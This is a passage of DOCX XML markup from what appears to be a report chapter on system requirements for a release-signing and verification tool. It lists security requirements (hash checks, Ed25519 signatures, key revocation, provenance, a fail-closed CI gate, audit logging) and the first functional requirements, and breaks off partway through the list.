          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>CHAPTER 4</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>SYSTEM REQUIREMENTS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4.1 Security Requirements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 4.1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Security requirements and where they are implemented</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="680"/>
        <w:gridCol w:w="3175"/>
        <w:gridCol w:w="1360"/>
        <w:gridCol w:w="3742"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3175"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Security requirement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1361"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Addresses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3742"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Implemented by</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SR1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3175"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Detect any modification of a released artifact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1361"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>V3, V4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3742"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>SHA-256 recomputation vs signed manifest (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>verify.py</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> stage 5)</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SR2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3175"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Accept only releases signed by the trusted vendor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1361"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>V2, V4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3742"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ed25519 signature over canonical manifest (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>sign.py</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>verify.py</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> stage 4)</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SR3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3175"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Decouple trust from the storage server and transport</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1361"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>V2, V3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3742"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Signature verified with the customer's trusted public key, independent of where the file came from</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SR4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3175"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Leaked or retired keys can be invalidated immediately</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1361"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Key theft</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3742"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Key revocation list </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>keys/revoked_keys.json</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>key_manager.py</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>, stage 2)</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SR5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3175"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Only authorised signers, keys and versions are admitted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1361"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>V2, replay</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3742"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>SecurityPolicy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>: trusted signers, allowed key IDs, revoked and minimum versions (stage 3)</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SR6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3175"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Artifacts must come from an approved source and build</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1361"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Build compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3742"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>SLSA-style provenance: approved repository, security tests passed, artifact digest (stages 3 and 6)</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SR7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3175"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Verification is automatic and fail-closed in CI/CD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1361"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>V3, V6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3742"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>ci/security_gate.py</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>: exit 1 blocks the pipeline</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SR8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3175"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Every signing and verification decision is recorded</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1361"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Repudiation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3742"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>SQLite audit log + Flask dashboard</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SR9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3175"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>The private key is never distributed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1361"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Key theft</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3742"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Customers hold only public keys; production key in HSM/KMS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4.2 Functional Requirements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>FR1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Compute the SHA-256 digest of an artifact and write SLSA-style provenance (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>&lt;artifact&gt;.provenance.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>FR2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Create a release manifest with artifact, version, sha256, algorithm, signature_algorithm, signer, key_id, timestamp and provenance_ref, and sign it with Ed25519.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>FR3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Generate Ed25519 key pairs, compute key fingerprints, rotate keys and maintain a key revocation list.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>FR4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Verify an artifact and manifest and return a verdict (PASS / BLOCKED) with a status code: HASH_MISMATCH, INVALID_SIGNATURE, UNAUTHORIZED_KEY, REVOKED, INVALID_MANIFEST, PROVENANCE_MISMATCH and others.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
